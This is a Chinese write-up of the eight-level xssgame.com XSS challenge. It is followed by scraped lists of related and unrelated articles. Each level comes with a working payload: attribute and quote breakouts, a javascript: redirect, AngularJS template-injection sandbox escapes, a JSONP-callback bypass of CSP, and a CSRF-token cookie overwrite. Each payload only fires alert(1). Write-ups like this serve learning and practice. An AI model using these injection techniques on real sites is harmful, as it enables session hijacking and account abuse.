0x00

继续做xss吧

这次是xssgame

地址 http://www.xssgame.com/

一共八关 学到了很多东西

0x01

啥也没有

<svg/onload="alert(1)">

0x02

显然是这个点了

');alert(1)('       就行了  多个属性用分号间隔

换行回车也行

0x03

换图片的时候发现#1 这个东西 找了下显然是这个点

双引号没有成功 试了下单引号

#1.jpg' onload="alert(1)"  然后就是这样了

0x04

welcomewelcome下有个sign up  点击到singup下  signup?next=confirm 输入email之后到confirm下 自动跳转 confirm?next=welcome

一直是这样的循环  confirm下是一个自动跳转到welcome的

想到了伪协议 javascript:alert(1) 这就弹了

0x05

发现表单里还有两个隐藏的input

但是输入好像都不行

没辙看了wp 发现是一个angular js模板注入

ng-non-bindable这个下所有的属性都不会解析怪不得怎么闭合都没用

在campaign这个参数下

google出来的payload

{{x = {'y':''.constructor.prototype}; x['y'].charAt=[].join;$eval('x=alert(1)');}} 不能弹

但是wp给的payload可以

{{$eval(%27alert(1)%27)}}

两个隐藏的input的name参数都可以弹

0x06

还是angular模板 找了对应版本的注入payload

发现不行

单引号被转为实体字符了

试了一下get发送参数 发现会显示在form上

但是{会被吃掉

wp的意思是因为会经过模板的渲染 所以可以用实体字符

&lcub;用来代替{

&lcub;&lcub;a=%27constructor%27;b=&lcub;};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,%27alert(1)%27)()}}

&lcub;&lcub;$eval(%27alert(1)%27)}}

0x07

这道题说的是csp的绕过

Content-Security-Policy:default-src http://www.xssgame.com/f/d9u16LTxchEi/ http://www.xssgame.com/static/

观察页面 可见?menu=YWJvdXQ=  后面的参数会被base64解码

<script src="jsonp?menu=about"></script>这个东西就比较有意思了

搜了一下jsonp xss 提到了jsonp有个callback这个参数可能导致xss

传参给menu经过base加密的就好了

<script src="jsonp?callback=alert(1)"></script>

0x08

csp和前一题没有区别

有两个表单发给不同的地方 set和transfer

transfer的amount参数要求为数字 如果不为数字则会被显示

像是一个xss的点

插入xss代码发现不允许弹框 因为csrf_token的问题

仔细观察可以发现set表单下有些东西

首先可以设置name

同时设置的东西是存在cookie里面的

这样就可以控制csrf_token

其次redirect是控制跳转的

这样就可以通过设置csrf_token然后跳转到transfer下弹框

set?name=csrf_token&value=xx&redirect=transfer?name=attacker&amount=xxx"><script>alert(1)</script>&csrf_token=xx

但是不知道为啥 如果符号不经过url编码就不能成功

0x0X

这次其实还是一般参考了wp

暂时也只能做得出来简单的xss了

但是还是学习了一些新的姿势

xss挑战赛小记 0x03(xssgame)的更多相关文章

  1. xss挑战赛小记 0x02(prompt(1))

    0x0O 上次搜xss挑战赛的时候 还找到了一个看上去难度更高的挑战赛 今天做了一下 学到了很多新东西 这个挑战赛能够在页面成功prompt(1)就算过关了 挑战地址 http://prompt.ml ...

  2. xss挑战赛小记 0x01(xsstest)

    0x00 今天在先知社区看到了一个xss挑战赛 结果发现比赛已经结束 服务器也关了 百度找了个xss挑战赛来玩一下 正好印证下xss的学习--- 地址     http://test.xss.tv/ ...

  3. 某xss挑战赛闯关笔记

    0x0 前言 在sec-news发现先知上师傅monika发了一个xss挑战赛的闯关wp([巨人肩膀上的矮子]XSS挑战之旅---游戏通关攻略(更新至18关)https://xianzhi.aliyu ...

  4. XSS挑战赛(3)

    查看关键代码: <?php ini_set("display_errors", 0); $str = $_GET["keyword"]; $str00 = ...

  5. XSS挑战赛(2)

    进入第六关 简单判断过滤情况 <>script"'/ 查看源代码 可以看到第二个红框部分跟之前类似,闭合双引号尝试进行弹窗 "><script>ale ...

  6. XSS挑战赛(4)

    16-20关 第十六关 关键代码为: <?php ini_set("display_errors", 0); $str = strtolower($_GET["ke ...

  7. XSS挑战赛(1)

    以前囫囵吞枣做过一遍,现在从头再来 第一关网址为:http://127.0.0.1/xss-labs-master/level1.php?name=test 而页面上显示了用户test,name可控, ...

  8. 先知xss挑战赛学习笔记

    xss游戏 游戏地址:http://ec2-13-58-146-2.us-east-2.compute.amazonaws.com/ LEMON参考wp地址 1. 文件上传 源码如下 <?php ...

  9. 有趣的游戏:Google XSS Game

    Google最近出了一XSS游戏: https://xss-game.appspot.com/ 我这个菜鸟看提示,花了两三个小时才全过了.. 这个游戏的规则是仅仅要在攻击网页上弹出alert窗体就能够 ...

随机推荐

  1. CSS基础语法(一) CSS的3种引入

    CSS样式表 CSS可算是网页设计的一个突破,它解决了网页界面排版的难题.可以这么说,HTML的Tag主要是定义网页的内容(Content),而CSS决定这些网页内容如何显示(Layout). Web ...

  2. BZOJ3262:陌上花开(CDQ分治)

    Description 有n朵花,每朵花有三个属性:花形(s).颜色(c).气味(m),用三个整数表示. 现在要对每朵花评级,一朵花的级别是它拥有的美丽能超过的花的数量. 定义一朵花A比另一朵花B要美 ...

  3. bzoj 2179 FFT

    求两个高精度的乘法. 根据高位低位,填入多项式的系数,求两个卷积,然后进位操作.

  4. Sublime Text 插件 【转】

    好厉害,好漂亮. http://www.cnsecer.com/460.html 安装Sublime Text 3插件的方法: 朋友们,小站活着不容易,全靠广告费养着了,如果本文对你有帮助.麻烦动下手 ...

  5. LA 4015 树形背包

    题目链接:https://vjudge.net/contest/164840#problem/D 题意: 给一棵树,每条边上有一些权值,求 长度不超过 x ,最多能走多少个点: 分析: 考虑每一个节点 ...

  6. NEUACM1132: Renew MST Quickly 增量最小生成树

    题目链接:http://acm.neu.edu.cn/hustoj/problem.php?id=1132 和UVa11354很类似 题意: 原先有一棵树,每次加一条边,看最小生成树大小: 这个和增量 ...

  7. POJ 3020 Antenna Placement 【最小边覆盖】

    传送门:http://poj.org/problem?id=3020 Antenna Placement Time Limit: 1000MS   Memory Limit: 65536K Total ...

  8. 未启用当前数据库的 SQL Server Service Broker,请为此数据库启用 Service Broker

    ALTER DATABASE DATABASE_Name SET NEW_BROKER WITH ROLLBACK IMMEDIATE; ALTER DATABASE DATABASE_Name SE ...

  9. Android学习笔记_74_Android回调函数触发的几种方式 广播 静态对象

    一.通过广播方式: 1.比如登录.假如下面这个方法是外界调用的,那么怎样在LoginActivity里面执行登录操作,成功之后在回调listener接口呢?如果是平常的类,可以通过构造函数将监听类对象 ...

  10. Mac改变系统截图存储路径

    时间:2018年9月13日 人物:同事和我 事情:看苹果秋季新品发布会,并且想要截图下来当时的新品介绍. 问题:系统的截图默认是存储在桌面,整理的时候,不是很方便. Mac截图快捷键: 截取选中区域: ...